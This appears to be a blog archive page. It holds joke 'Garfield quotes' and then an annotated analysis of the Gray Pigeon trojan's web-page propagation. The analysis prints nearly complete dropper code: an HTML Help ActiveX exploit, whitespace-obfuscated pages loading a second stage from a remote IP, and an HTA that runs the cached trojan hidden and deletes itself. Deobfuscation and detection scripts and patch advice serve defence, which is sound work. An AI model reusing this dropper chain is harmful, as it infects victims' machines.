Category Archives: Uncategorized

Garfield quotes

Money is not everything. There's MasterCard & Visa.
(Chinese version: money isn't omnipotent; sometimes you still need a credit card.)

One should love animals. They are so tasty.

Save water. Shower with your girlfriend.

Love the neighbor. But don't get caught.
(Chinese version: love your neighbour wholeheartedly, just don't let her husband find out.)

Behind every successful man, there is a woman.
And behind every unsuccessful man, there are two.

Every man should marry. After all, happiness is not the only thing in life.
(Chinese version: even the happiest bachelor marries sooner or later; happiness doesn't last anyway.)

The wise never marry, and when they marry they become otherwise.
(Chinese version: smart people are all unmarried; once married, it is hard to be smart again.)

Success is a relative term. It brings so many relatives.

Never put off the work till tomorrow what you can put off today.
(Chinese version: don't wait until tomorrow, when you can't deliver, to look for an excuse; find one today.)

Love is photogenic. It needs darkness to develop.

Children in backseats cause accidents. Accidents in backseats cause children.

Your future depends on your dreams. So go to sleep.

There should be a better way to start a day than waking up every morning.

Hard work never killed anybody. But why take the risk?
(Chinese version: hard work doesn't cause death, but I'm not going to prove it with myself.)

Work fascinates me. I can look at it for hours!
(Chinese version: work is great fun, especially watching other people do it.)

God made relatives; thank God we can choose our friends.

When two's company, three's the result!
(Chinese version: two people is an unstable state; three is stable!)

A dress is like a barbed fence. It protects the premises without restricting the view.

The more you learn, the more you know; the more you know, the more you forget.
The more you forget, the less you know. So why bother to learn.

Gray Pigeon (灰鸽子) trojan: analysis of its web-page propagation

Quite a few people have been infected with the Gray Pigeon trojan recently, so here is an analysis of how it spreads through web pages.
The landing page generates a frame, as follows:

<iframe src="http://www.qq.com/" width="800" height="600"></iframe>
<script language=javascript>
ie='fucksnow';
ver=navigator.appVersion;
if(!(ver.indexOf('NT 5.0')==-1))ie='nt';
if(!(ver.indexOf('Windows 98')==-1)){ie='98';}
location.href=ie+'.htm';
</script>

The iframe embedded in the page is only there to mislead; the important part is not the iframe but the JavaScript that follows it.

<iframe src="http://www.qq.com/" width="800" height="600"></iframe>   // decoy
<script language=javascript>
ie='fucksnow';                // default: ie='fucksnow' (used for XP and anything not matched below)
ver=navigator.appVersion;   // get the browser/OS version string
if(!(ver.indexOf('NT 5.0')==-1)) ie='nt';      // Windows 2000 (NT 5.0): ie='nt'
if(!(ver.indexOf('Windows 98')==-1)) {ie='98';}   // Windows 98: ie='98'
location.href=ie+'.htm';    // redirect to ie+'.htm', i.e. 98.htm, nt.htm or fucksnow.htm
</script>

 
Credit to the author's attention to detail: the three pages 98.htm, nt.htm and fucksnow.htm differ in exactly one place, the location of the .chm file being abused, because the help-file directory differs between Windows 98, 2000 and XP, and a separate trigger was set up for each. On that count the job is done better than by many domestic software vendors.
Take fucksnow.htm as the example. Viewed directly, its source looks like garbage, but it is not: it relies on IE ignoring extra whitespace when it parses HTML, so the real code is buried in padding. Strip the padding and tidy up a little and you get the code below.
 

 
<SCRIPT language=VScript src="mmmmm.gif"></SCRIPT>               // load mmmmm.gif; this is not really an image, more on it below
<SCRIPT language=VScript src="xxxxx.pif"></SCRIPT>               // load xxxxx.pif, the Gray Pigeon trojan itself; the point is to get it into the IE cache
<HTML><BODY>
<div style="display:none">
// exploit the HTML Help (chm) vulnerability through the HHCtrl ActiveX control
<OBJECT id="news140" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="RelatedTopics,MENU"><PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;/windows/help/apps.chm'></OBJECT>   // the .chm path is the one thing that differs between 98.htm, nt.htm and fucksnow.htm
<OBJECT id="news162" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="RelatedTopics,MENU"><PARAM name="Window" value="$global_ifl">
// use the same chm hole to run the script inside mmmmm.gif; String.fromCharCode(62) supplies the '>' characters so that "</SCRIPT>" never appears literally
<PARAM name="Item1" value='command;javascript:eval("document.write("<SCRIPT language=JScript src="http://218.106.9.136/inc/mmmmm.gif""+String.fromCharCode(62)+"</SCR"+"IPT"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<SCRIPT>news140.Click();f1=1+1;f1=f1+2;setTimeout("news162.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>   // trigger both objects; the f1/fu1 arithmetic is junk padding
// yet another decoy: a zero-size iframe to http://xuemulove.com/a.gif, which does not exist
<iframe src="http://xuemulove.com/a.gif" width="0" height="0">
</iframe><BODY onload="window.status='页面已装载!'">   // sets the status bar text to "Page loaded!"
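As an added example (not part of the original analysis, and not the trojan author's code), here is a small deobfuscation helper for whitespace-padded pages like fucksnow.htm and mmmmm.gif. It collapses runs of whitespace instead of deleting them, so tag and attribute names stay separated, and it also folds the String.fromCharCode(62) and "</SCR"+"IPT" tricks seen above so the hidden </SCRIPT> and the real script src become readable. The padded sample is constructed to imitate the fragment above; it is not the real file, and the helper names are my own.

```python
import re

# Constructed sample imitating the padded fucksnow.htm fragment from the analysis above.
# It is not the real file; the padding (runs of spaces and blank lines) is the point.
PADDED_SAMPLE = r'''<SCRIPT          language=VScript        src="mmmmm.gif">      </SCRIPT>



<OBJECT    id="news162"    classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM    name="Item1"    value='command;javascript:eval("document.write("<SCRIPT language=JScript src="http://218.106.9.136/inc/mmmmm.gif""   +   String.fromCharCode(62)   +   "</SCR"   +   "IPT"   +   String.fromCharCode(62))")'>
</OBJECT>
'''

_WS_RUN = re.compile(r'[ \t\r\n\f]+')
_FROMCHARCODE = re.compile(r'String\.fromCharCode\(\s*([0-9]+(?:\s*,\s*[0-9]+)*)\s*\)')
# Only a string literal joined directly to another literal ("a" + "b", 'a' + 'b') is folded.
_STR_JOIN = re.compile(r'"\s*\+\s*"|\'\s*\+\s*\'')


def collapse_padding(src: str) -> str:
    """Collapse every run of whitespace to a single space.

    IE tolerates the padding, which is what hides the code. Deleting the spaces
    outright fuses attribute names into the tag name (<SCRIPTlanguage=...>),
    so collapse rather than delete.
    """
    return _WS_RUN.sub(' ', src).strip()


def resolve_fromcharcode(src: str) -> str:
    """Rewrite String.fromCharCode(62) into the quoted literal ">" so it can be folded."""
    def repl(m):
        codes = [int(c) for c in re.split(r'\s*,\s*', m.group(1))]
        return '"' + ''.join(chr(c) for c in codes) + '"'
    return _FROMCHARCODE.sub(repl, src)


def fold_string_concat(src: str) -> str:
    """Join "</SCR" + "IPT" + ">" into "</SCRIPT>"."""
    return _STR_JOIN.sub('', src)


def deobfuscate(src: str) -> str:
    """Run the three passes in order; the output is for reading, never for execution."""
    return fold_string_concat(resolve_fromcharcode(collapse_padding(src)))


def script_sources(src: str) -> list:
    """List the src= targets of every <script> tag once the page is readable."""
    return re.findall(r'<script[^>]*\ssrc\s*=\s*"([^"]+)"', deobfuscate(src), flags=re.I)


if __name__ == '__main__':
    print(deobfuscate(PADDED_SAMPLE))
    print(script_sources(PADDED_SAMPLE))
```

Running it on the sample yields two script sources, the local mmmmm.gif and the remote http://218.106.9.136/inc/mmmmm.gif, which is exactly the second-stage URL the chm trick injects; the same three passes make mmmmm.gif itself readable.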
mmmmm.gif analysis: the code is hidden the same way as in fucksnow.htm; once the padding is removed you see the following.

document.write('<html><HEAD><SCRIPT language=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD></html>');    // move the pop-up window to x,y = 4000,4000 and shrink it to 0x0 so you never see it
// use ADODB.Recordset to write a file to disk
try{BOSSYU=new ActiveXObject("ADODB.Recordset");BOSSYU.Fields.Append("a",200,3000);BOSSYU.Open();BOSSYU.AddNew();BOSSYU.Fields("a").Value="
// the content being written, an HTA
<HTML><BODY onLoad="window.moveTo(4000,4000);">
<HEAD><SCRIPT language=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD>
// the HTA runs with local privileges, so the real work happens here
<HTA:APPLICATION ID=kk3714 CAPTION="no" BORDER="none" HEIGHT="0" SHOWINTASKBAR="no" WIDTH="0">
<BODY scroll="no" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript">
// xxxxx.pif was already fetched when fucksnow.htm loaded, so it now sits in the IE cache. IE stores cached copies under names like xxxxx[1].pif, xxxxx[2].pif; the routine below walks the cache to find it and run it
function thanks(b){
try{
var c=new Enumerator(YUri.GetFolder(b).SubFolders);
for(;!c.atEnd();c.moveNext())
{var zI01=c.item().Path+"\\xxxxx[1].pif";
var z1=c.item().Path+"\\xxxxx[2].pif";
var f="C:\\boot.exe";
if(YUri.FileExists(zI01))     // found the trojan as xxxxx[1].pif
 {YUri.CopyFile(zI01,f);     // copy it to C:\boot.exe
w00sh.Run(f,0,false);      // run the trojan with a hidden window
v=1;break;}
if(YUri.FileExists(z1))        // same, for the file name xxxxx[2].pif
{YUri.CopyFile(z1,f);
w00sh.Run(f,0,false);
v=1;break;}
thanks(c.item());}}   // recurse into sub-folders
catch(e){}}
function agree(){
path="c:\\boOt.bat";     // create boot.bat
v=kk3714.commandLine;    // the HTA's own (quoted) path, c:\bootlog.hta
v=v.substring(1,v.length-2);
var _w=YUri.CreateTextFile(path);
_w.Write('@eCho oFf \r\n:A\r\nDeL "'+v+'"\r\nif eXiSt "'+v+'" gOto A\r\nDEl %0');   // write the commands into boot.bat; the batch file reads:
====================
@echo off
:a
del v     // delete v, i.e. this HTA, c:\bootlog.hta
if exist v goto a   // if it is still there, jump back to :a and keep deleting
del %0    // delete the batch file itself
====================
_w.close();
w00sh.Run(path,0,false);
window.close();
}
// read the location of the IE cache so xxxxx.pif can be searched for
var v=0;
try{
var YUri=new ActiveXObject("Scripting.FileSystemObject");
var w00sh=new ActiveXObject("WScript.Shell");
var cache=w00sh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache");
}catch(e){}
function fish()
{try{if(v==0){thanks(cache+'\\..');setTimeout("fish()",4000);}else{agree();}}catch(e){}}   // poll every 4 s until the trojan has been run, then clean up
fish();</SCRIPT></BODY></HTML>";
// save as c:\bootlog.hta and execute it through the HHCtrl "shortcut" command
BOSSYU.Update();}catch(e){}try{BOSSYU.Save("c:\\bootlog.hta",0);}catch(e){}document.write('<object id="bbs1" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><param name="Command" value="shortcut"><param name=item1 value=",c:\\bootlog.hta"></object>
<OBJECT id="bbs2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><param name="Command" value="Close"><param name="kav" value="out"></oBjEct>
<ScRipt>c=1;bbs1.Click();c=1;c=c+5;bbs2.Click();c=c+1;</script>');

In short, the whole chain rides on the HTML Help (chm) vulnerability: a system with all patches applied will not be infected, and temporarily disabling JavaScript also stops it. Every stage after the redirect additionally depends on ActiveX (the HHCtrl object, ADODB.Recordset, Scripting.FileSystemObject and WScript.Shell), so disabling ActiveX controls and scripting for the Internet zone breaks it as well. On a machine that did get hit, the artefacts to look for are C:\boot.exe, c:\bootlog.hta and c:\boot.bat, plus a cached xxxxx[n].pif.
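A detection-side counterpart, added here as an example and not part of the original post: a scanner that flags the links of the chain described above (the HHCtrl object with a RelatedTopics/shortcut Command, an Item1 carrying command;javascript:, a <script src> pointing at a .pif or .gif, ADODB.Recordset saving an .hta, HTA:APPLICATION, FileSystemObject/WScript.Shell). The rule names, weights and score threshold are my own choices, and both sample pages are constructed, modelled on the fragments above rather than copied from the real files.

```python
import re

# Constructed sample modelled on the fucksnow.htm + mmmmm.gif fragments analysed above.
# Not the real files: only the indicators are reproduced.
SUSPECT_PAGE = r'''<iframe src="http://www.qq.com/" width="800" height="600"></iframe>
<SCRIPT language=VScript src="xxxxx.pif"></SCRIPT>
<OBJECT id="news162" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="RelatedTopics,MENU">
<PARAM name="Item1" value='command;javascript:eval("document.write(...)")'>
</OBJECT>
<SCRIPT>
try{BOSSYU=new ActiveXObject("ADODB.Recordset");BOSSYU.Fields("a").Value="
<HTA:APPLICATION ID=kk3714 CAPTION="no" SHOWINTASKBAR="no" WIDTH="0">
<SCRIPT>var YUri=new ActiveXObject("Scripting.FileSystemObject");</SCRIPT>";
BOSSYU.Save("c:\\bootlog.hta",0);}catch(e){}
</SCRIPT>
'''

# Constructed benign page: an iframe and an ordinary script include.
BENIGN_PAGE = '''<html><body>
<iframe src="http://www.qq.com/" width="800" height="600"></iframe>
<script src="/js/app.js"></script>
</body></html>
'''

HHCTRL_CLSID = 'adb880a6-d8ff-11cf-9377-00aa003b7a11'   # HTML Help ActiveX control (hhctrl.ocx)

# (rule name, pattern, weight): one rule per stage of the chain. Weights are illustrative.
RULES = [
    ('hhctrl_object',    re.compile(r'classid\s*=\s*"?clsid:' + HHCTRL_CLSID, re.I), 3),
    ('hhctrl_command',   re.compile(r'name\s*=\s*"?Command"?\s+value\s*=\s*"?(?:RelatedTopics|shortcut)', re.I), 2),
    ('hhctrl_item1_js',  re.compile(r'name\s*=\s*"?Item1"?\s+value\s*=\s*[\'"]command;javascript:', re.I), 3),
    ('script_src_nonjs', re.compile(r'<script[^>]*\ssrc\s*=\s*"?[^"\s>]+\.(?:pif|gif|jpg|exe)\b', re.I), 3),
    ('adodb_recordset',  re.compile(r'ActiveXObject\(\s*"ADODB\.Recordset"', re.I), 2),
    ('save_hta',         re.compile(r'\.Save\(\s*"[^"]*\.hta"', re.I), 3),
    ('hta_application',  re.compile(r'<HTA:APPLICATION\b', re.I), 2),
    ('fso_or_wshell',    re.compile(r'"(?:Scripting\.FileSystemObject|WScript\.Shell)"', re.I), 2),
]
THRESHOLD = 6   # my choice: the HHCtrl object plus at least one more stage


def normalise(html: str) -> str:
    """Collapse the whitespace padding so the patterns see ordinary markup."""
    return re.sub(r'\s+', ' ', html)


def scan(html: str) -> dict:
    """Return the rules that fired, their summed weight and a verdict."""
    text = normalise(html)
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(w for name, _, w in RULES if name in hits)
    verdict = 'chm/hta dropper chain' if score >= THRESHOLD else 'clean'
    return {'hits': hits, 'score': score, 'verdict': verdict}


if __name__ == '__main__':
    for label, page in (('suspect', SUSPECT_PAGE), ('benign', BENIGN_PAGE)):
        print(label, scan(page))
```

The decoy iframe to www.qq.com is deliberately not a rule: it appears in both pages and, as the analysis notes, carries nothing of interest. Because the scanner normalises whitespace first, the padded and unpadded forms of a page score identically.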